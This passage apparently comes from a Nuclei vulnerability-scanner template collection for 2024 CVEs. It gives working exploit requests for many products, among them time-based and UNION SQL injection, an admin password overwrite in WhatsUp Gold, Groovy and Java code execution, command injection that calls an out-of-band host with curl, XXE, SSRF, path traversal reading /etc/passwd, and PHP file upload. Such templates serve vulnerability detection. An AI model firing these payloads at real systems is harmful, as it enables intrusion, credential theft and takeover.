utnserver Pro/ProMAX/INU-100 20.1.22 - File Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/info/dir?/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/var/tmp</td>","File System Info","face=\"courier"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1061","info":{"name":"WordPress HTML5 Video Player - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(header, \"application/json\")","contains_all(body, \"created_at\", \"video_id\")"],"condition":"and"}]}]},{"id":"CVE-2024-0195","info":{"name":"SpiderFlow Crawler Platform - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["SPIDER_FLOW_VERSION"]}]},{"raw":["POST /function/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-34102","info":{"name":"Adobe Commerce & Magento - CosmicSting","severity":"critical"},"requests":[{"raw":["POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://{{interactsh-url}}/xxe.xml\",\"dataIsURL\":true,\"options\":12345678}}}}}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(content_type, \"application/json\")","contains_any(body, \"log file\", \"cartId\", \"no Route\")","contains(body, \"message\")"],"condition":"and"}]}]},{"id":"CVE-2024-31982","info":{"name":"XWiki < 4.10.20 - Remote code execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20","{{BaseURL}}/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20"],"skip-variables-check":true,"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Hello from search text:42</title>\", \"<title>RSS feed\")","contains(header, \"text/javascript\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-32231","info":{"name":"Stash < 0.26.0 -  SQL Injection","severity":"critical"},"requests":[{"raw":["POST /graphql HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json\n\n{\"operationName\":\"FindPerformers\",\"variables\":{\"filter\":{\"q\":\"\",\"page\":1,\"per_page\":40,\"sort\":\"name;select performers.id FROM performers union select group_concat(sqlite_version(),':')-- -\",\"direction\":\"ASC\"},\"performer_filter\":{}},\"query\":\"query FindPerformers($filter: FindFilterType, $performer_filter: PerformerFilterType, $performer_ids: [Int!]) {\\n  findPerformers(\\n    filter: $filter\\n    performer_filter: $performer_filter\\n    performer_ids: $performer_ids\\n  ) {\\n    count\\n    performers {\\n      ...PerformerData\\n      __typename\\n    }\\n    __typename\\n  }\\n}\\n\\nfragment PerformerData on Performer {\\n  id\\n  name\\n  disambiguation\\n  url\\n  gender\\n  twitter\\n  instagram\\n  birthdate\\n  ethnicity\\n  country\\n  eye_color\\n  height_cm\\n  measurements\\n  fake_tits\\n  penis_length\\n  circumcised\\n  career_length\\n  tattoos\\n  piercings\\n  alias_list\\n  favorite\\n  ignore_auto_tag\\n  image_path\\n  scene_count\\n  image_count\\n  gallery_count\\n  movie_count\\n  performer_count\\n  o_counter\\n  tags {\\n    ...SlimTagData\\n    __typename\\n  }\\n  stash_ids {\\n    stash_id\\n    endpoint\\n    __typename\\n  }\\n  rating100\\n  details\\n  death_date\\n  hair_color\\n  weight\\n  __typename\\n}\\n\\nfragment SlimTagData on Tag {\\n  id\\n  name\\n  aliases\\n  image_path\\n  parent_count\\n  child_count\\n  __typename\\n}\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["converting driver\\.Value type string \\(\\\\\"3.*?\\\\\"\\) to a int: invalid syntax"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5947","info":{"name":"Deep Sea Electronics DSE855 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"Copyright Deep Sea Electronics\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /Backup.bin HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type,\"Unknown\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-1709","info":{"name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SetupWizard.aspx/{{string}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SetupWizardPage","ContentPanel SetupWizard"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","part":"header","kval":["Server"]}]}]},{"id":"CVE-2024-31621","info":{"name":"Flowise 1.6.5 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/API/V1/credentials"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"credentialName\":","\"updatedDate\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-37393","info":{"name":"SecurEnvoy Two Factor Authentication - LDAP Injection","severity":"critical"},"requests":[{"raw":["POST /secserver/? HTTP/2\nHost: {{Hostname}}\n\nFLAG=DESKTOP\n1\nSTATUS:INIT\nUSERID:{{userid}})(sAMAccountName=*\nMEMBEROF:Domain Users\n","POST /secserver/? HTTP/2\nHost: {{Hostname}}\n\nFLAG=DESKTOP\n1\nSTATUS:INIT\nUSERID:*)(sAMAccountName=*\nMEMBEROF:Domain Users\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, 'Error checking Group')","status_code_1 == 200","contains(body_2, 'GETPASSCODE')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-5765","info":{"name":"WpStickyBar <= 2.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body, \"/plugins/wpstickybar-sticky-bar-sticky-header\")"],"internal":true}]},{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stickybar_display&banner_id=1%20AND%20SLEEP(6);\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-24131","info":{"name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/api.php/<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","SuperWebMailerAPI"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1183","info":{"name":"Gradio - Server Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /file=http://oast.pro HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2024-3097","info":{"name":"NextGEN Gallery <= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ngg/v1/admin/block/image/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":","\"image\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29868","info":{"name":"Apache StreamPipes <= 0.93.0 - Use of Cryptographically Weak PRNG in Recovery Token Generation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/streampipes-backend/api/v2/auth/settings"],"headers":{"User-Agent":"{{randstr}}"},"extractors":[{"type":"json","part":"body","name":"settings","group":1,"json":["if .allowPasswordRecovery==true and .allowSelfRegistration==true then true else false end"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/streampipes-backend/api/openapi.json"],"headers":{"User-Agent":"{{randstr}}"},"extractors":[{"type":"json","part":"body","name":"version","group":1,"json":[".info.version"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains(settings, true)","compare_versions(version, '>= 0.69.0') && compare_versions(version, '<= 0.93.0')"],"condition":"and"}]}]},{"id":"CVE-2024-5084","info":{"name":"Hash Form <= 1.1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP /1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action&file_uploader_nonce={{nonce}}&allowedExtensions%5B0%5D=txt&sizeLimit=1048576&qqfile={{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{md5(num)}}\n","GET /wp-content/uploads/hashform/temp/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2,\"success\",\"true\",\"url\") && status_code_2 == 200","contains(body_3,\"{{md5(num)}}\") && status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"ajax_nounce\":\"([0-9a-z]+)\",\"preview_img"],"internal":true}]}]},{"id":"CVE-2024-0200","info":{"name":"Github Enterprise Authenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v3/user/orgs"],"headers":{"Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"extractors":[{"type":"json","part":"body","name":"org_name","internal":true,"json":[".[].login"]}]},{"method":"GET","path":["{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"],"headers":{"Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"matchers-condition":"and","matchers":[{"type":"word","words":["\"role\": \"admin\""],"part":"body"}]},{"method":"POST","path":["{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"],"headers":{"Content-Type":"application/json","Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"body":"{\n  \"name\": \"{{randstr}}\"\n}\n","matchers":[{"type":"status","status":[201]}]},{"method":"GET","cookie-reuse":true,"path":["{{BaseURL}}/login"],"extractors":[{"type":"regex","part":"body","internal":true,"group":1,"regex":["name=\"authenticity_token\" value=\"(.*?)\""],"name":"csrf_token"}]},{"method":"POST","path":["{{BaseURL}}/session"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&\n","matchers":[{"type":"status","status":[302]},{"type":"word","words":["_gh_render"],"part":"header"}]},{"method":"GET","path":["{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"],"extractors":[{"type":"regex","group":1,"name":"ghe_secret","internal":true,"regex":["&quot;ENTERPRISE_SESSION_SECRET&quot;=&gt;&quot;([^\"]+?)&quot;"],"part":"body"}],"matchers":[{"type":"word","words":["ENTERPRISE_SESSION_SECRET"],"part":"body"}]},{"method":"GET","path":["{{BaseURL}}/"],"headers":{"Cookie":"_gh_render={{final_payoad}}"},"matchers-condition":"and","matchers":[{"type":"status","status":[500]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-21893","info":{"name":"Ivanti SAML - Server Side Request Forgery (SSRF)","severity":"high"},"requests":[{"raw":["POST /dana-ws/saml20.ws HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\t<soap:Body>\t\t<ds:Signature\t\txmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\t\t\t<ds:SignedInfo>\t\t\t\t<ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/>\t\t\t\t<ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/>\t\t\t</ds:SignedInfo>\t\t\t<ds:SignatureValue>qwerty</ds:SignatureValue>\t\t\t<ds:KeyInfo xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.w3.org/2000/09/xmldsig\" xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\t\t\t\t<ds:RetrievalMethod URI=\"http://{{interactsh-url}}\"/>\t\t\t\t<ds:X509Data/>\t\t\t</ds:KeyInfo>\t\t\t<ds:Object></ds:Object>\t\t</ds:Signature>\t</soap:Body></soap:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["/dana-na/","WriteCSS"],"condition":"and"}]}]},{"id":"CVE-2024-24565","info":{"name":"CrateDB Database - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"CREATE TABLE {{table_name}}(info_leak STRING)\"}\n","POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"COPY {{table_name}} FROM '/etc/passwd' with (format='csv', header=false)\"}\n","POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"SELECT * FROM {{table_name}} limit 100\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_3)","contains_all(header, 'application/json')","status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-1212","info":{"name":"Progress Kemp LoadMaster - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/access/set?param=enableapi&value=1"],"headers":{"Authorization":"Basic JztsczsnOmRvZXNub3RtYXR0ZXI="},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bin","mnt","WWW-Authenticate: Basic"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28995","info":{"name":"SolarWinds Serv-U - Directory Traversal","severity":"high"},"requests":[{"raw":["GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1\nHost: {{Hostname}}\n","GET /?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"Serv-U\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-32399","info":{"name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webeditor/../../../windows/win.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"[fonts]\", \"for 16-bit app support\")","contains(header, \"application/octet-stream\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4885","info":{"name":"Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /NmAPI/RecurringReport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: http://tempuri.org/IRecurringReportServices/TestRecurringReport\n\n<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"><s:Body><TestRecurringReport xmlns=\"http://tempuri.org/\"><rr xmlns:a=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.RecurringReports.DataContracts\" xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"><a:AlternateHost i:nil=\"true\"/><a:Disabled>false</a:Disabled><a:EmailSettings xmlns:b=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.Core.DataContracts\"><b:Authentication>None</b:Authentication><b:CredentialsId i:nil=\"true\"/><b:DirectoryPath>C:\\PROGRA~2\\Ipswitch\\WhatsUp\\Data\\ScheduledReports</b:DirectoryPath><b:Password/><b:Port>25</b:Port><b:SMTPServer/><b:SendFrom>WhatsUpGold@YourDomain.com</b:SendFrom><b:SendTo i:nil=\"true\"/><b:Subject>Emailing: Wireless Log</b:Subject><b:TimeoutSec>5</b:TimeoutSec><b:UseEncryptedConn>false</b:UseEncryptedConn><b:Username/></a:EmailSettings><a:ExportOptions><a:AuthorName>WhatsUp Gold</a:AuthorName><a:AutosizePDFPage>true</a:AutosizePDFPage><a:AvoidImageBreak>false</a:AvoidImageBreak><a:AvoidTextBreak>true</a:AvoidTextBreak><a:BrowserPageHeight>0</a:BrowserPageHeight><a:BrowserPageWidth>0</a:BrowserPageWidth><a:ConversionDelay>3</a:ConversionDelay><a:CustomPageHeight>0</a:CustomPageHeight><a:CustomPageWidth>0</a:CustomPageWidth><a:ExportAuthToken/><a:ExportType>html</a:ExportType><a:FitHeight>false</a:FitHeight><a:FitWidth>false</a:FitWidth><a:InternalLinksEnabled>false</a:InternalLinksEnabled><a:LiveURLsEnabled>false</a:LiveURLsEnabled><a:NavigationTimeout>240</a:NavigationTimeout><a:PageOrientation>Portrait</a:PageOrientation><a:PageSize>Letter</a:PageSize><a:PdfMessage>html</a:PdfMessage><a:PreviewEnabled>false</a:PreviewEnabled><a:Subject i:nil=\"true\"/><a:TimeFormat>g:i:s a</a:TimeFormat><a:Title i:nil=\"true\"/><a:ToMail>true</a:ToMail><a:WebExportDirectory>C:\\\\Program Files (x86)\\\\Ipswitch\\\\WhatsUp\\\\html\\\\NmConsole\\\\</a:WebExportDirectory><a:ZipEnabled>false</a:ZipEnabled></a:ExportOptions><a:IncludeURLInEmail>false</a:IncludeURLInEmail><a:Name>2e441d4d5a4b258b</a:Name><a:NextRun i:nil=\"true\"/><a:RecurringReportID>-1</a:RecurringReportID><a:Schedule xmlns:b=\"http://schemas.datacontract.org/2004/07/WUGDataAccess.Core.DataContracts\"><b:DailyDays>1</b:DailyDays><b:DailyOptions>Interval</b:DailyOptions><b:DaysOfTheWeek xmlns:c=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean></b:DaysOfTheWeek><b:MonthlyDayMonths>1</b:MonthlyDayMonths><b:MonthlyDayNumber>3</b:MonthlyDayNumber><b:MonthlyOptions>DayOfMonth</b:MonthlyOptions><b:MonthlyRecur>First</b:MonthlyRecur><b:MonthlyRecurDay>Sunday</b:MonthlyRecurDay><b:MonthlyRecurMonths>1</b:MonthlyRecurMonths><b:RecurringInterval>1</b:RecurringInterval><b:RecurringTimeIntervals>Minutes</b:RecurringTimeIntervals><b:ScheduleType>TimeInterval</b:ScheduleType><b:StartTime>2024-07-05T16:59:14.047957+01:00</b:StartTime><b:TimeIntervalStartDate>2024-07-05T16:59:14.047957+01:00</b:TimeIntervalStartDate><b:WeeklyWeeks>1</b:WeeklyWeeks><b:YearlyDayOfMonth>3</b:YearlyDayOfMonth><b:YearlyMonthRecur>First</b:YearlyMonthRecur><b:YearlyMonthRecurDay>Sunday</b:YearlyMonthRecurDay><b:YearlyMonths>March</b:YearlyMonths><b:YearlyOptions>DayOfYear</b:YearlyOptions><b:YearlyRecurMonth>March</b:YearlyRecurMonth></a:Schedule><a:URL>{\"title\":\"foo\",\"renderType\":\"aspx\",\"reports\":[{\"title\":\"thetitle\",\"url\":\"/NmConsole/api/Wireless/ReportWirelessLog\",\"dateRangeFilter\":{\"label\":\"Date Range\",\"n\":0,\"range\":\"Today\",\"text\":\"Today\"},\"severityFilter\":{\"label\":\"Severity\",\"value\":-1,\"text\":\"ALL\"},\"limit\":50,\"grid\":{\"emptyText\":\"[ No records found ]\",\"columns\":[{\"dataIndex\":\"Date\",\"text\":\"Date\",\"flex\":1},{\"dataIndex\":\"Severity\",\"text\":\"Severity\",\"flex\":1},{\"dataIndex\":\"Message\",\"text\":\"Message\",\"flex\":1}],\"filters\":[],\"sorters\":[]}}],\"baseUrl\":\"http://{{interactsh-url}}\",\"userId\":1}</a:URL><a:WebUserID>1</a:WebUserID><a:WebUserName>admin</a:WebUserName></rr></TestRecurringReport></s:Body></s:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["sPassword"]}]}]},{"id":"CVE-2024-34470","info":{"name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mailinspector/login.php"],"host-redirects":true,"matchers":[{"type":"word","part":"body","words":["Licensed to HSC TREINAMENTO"]}]},{"method":"GET","path":["{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27497","info":{"name":"Linksys E2000 1.0.06 position.js Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/position.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var session_key","close_session","HELPPATH"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-36104","info":{"name":"Apache OFBiz - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=\\u0074\\u0068\\u0072\\u006f\\u0077\\u0020\\u006e\\u0065\\u0077\\u0020\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0028\\u0027\\u0069\\u0064\\u0027\\u002e\\u0065\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u0028\\u0029\\u002e\\u0074\\u0065\\u0078\\u0074\\u0029\\u003b\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"word","part":"body","words":["java.lang.Exception"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0352","info":{"name":"Likeshop < 2.5.7.20210311 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/file/formimage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\n\n------WebKitFormBoundarygcflwtei\nContent-Disposition: form-data; name=\"file\";filename=\"{{filename}}.php\"\nContent-Type: application/x-php\n\n{{randstr}}\n------WebKitFormBoundarygcflwtei--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"\\\"name\\\":\\\"{{filename}}.php\\\"\")","contains_all(body, \"code\\\":1\", \"base_url\\\":\\\"uploads\\\\/user\")"],"condition":"and"}],"extractors":[{"type":"json","part":"body","json":[".data.url"]}]}]},{"id":"CVE-2024-6670","info":{"name":"WhatsUp Gold HasErrors SQL Injection - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"KeyStorePassword\": \"{{password}}\", \"TrustStorePassword\": \"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(set_cookie, 'ASP.NET_SessionId=')"],"condition":"and","internal":true}]},{"raw":["POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"deviceId\": \"22222\", \"classId\": \"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--\", \"range\": \"1\", \"n\": \"1\", \"start\": \"3\", \"end\": \"4\", \"businesdsHoursId\": \"5\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, 'application/json')"],"condition":"and","internal":true}]},{"raw":["GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'DisplayName')"],"condition":"and","internal":true}],"extractors":[{"type":"regex","internal":true,"name":"encryptedPassword","regex":["\"psyduck\\d+(,\\d+)*\""]}]},{"raw":["POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"deviceId\": \"22222\", \"classId\": \"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--\", \"range\": \"1\", \"n\": \"1\", \"start\": \"3\", \"end\": \"4\", \"businesdsHoursId\": \"5\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'false')"],"condition":"and","internal":true}]},{"raw":["POST /NmConsole/User/LoginAjax HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&rememberMe=false\n"],"matchers":[{"type":"word","part":"body","words":["\"authenticated\":true","\"username\":\""],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-0250","info":{"name":"Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://oast.me/%3f&code=x"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-27954","info":{"name":"WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"link\":\"file:"]},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2024-21644","info":{"name":"pyLoad Flask Config - Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/render/info.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&#39;SECRET_KEY&#39;:","&#39;pyload_session&#39;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2389","info":{"name":"Progress Kemp Flowmon - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains(header, 'application/json') && contains(header, 'Flowmon')"],"condition":"and"}]}]},{"id":"CVE-2024-6746","info":{"name":"EasySpider 0.6.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["GET /taskGrid/tasklist.html HTTP/1.1\nHost: {{Hostname}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Task List\",\"Task ID\",\"Task Name\",\"URL\",\"<title>\u4efb\u52a1\u5217\u8868 | Task List</title>\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /../../../../../../../../../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-25852","info":{"name":"Linksys RE7000 - Command Injection","severity":"high"},"requests":[{"raw":["PUT /goform/AccessControl HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"AccessPolicy\":\"0\",\"AccessControlList\":\"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`\"}\n"]},{"raw":["GET /{{filename}}.txt HTTP/1.1\nHost: 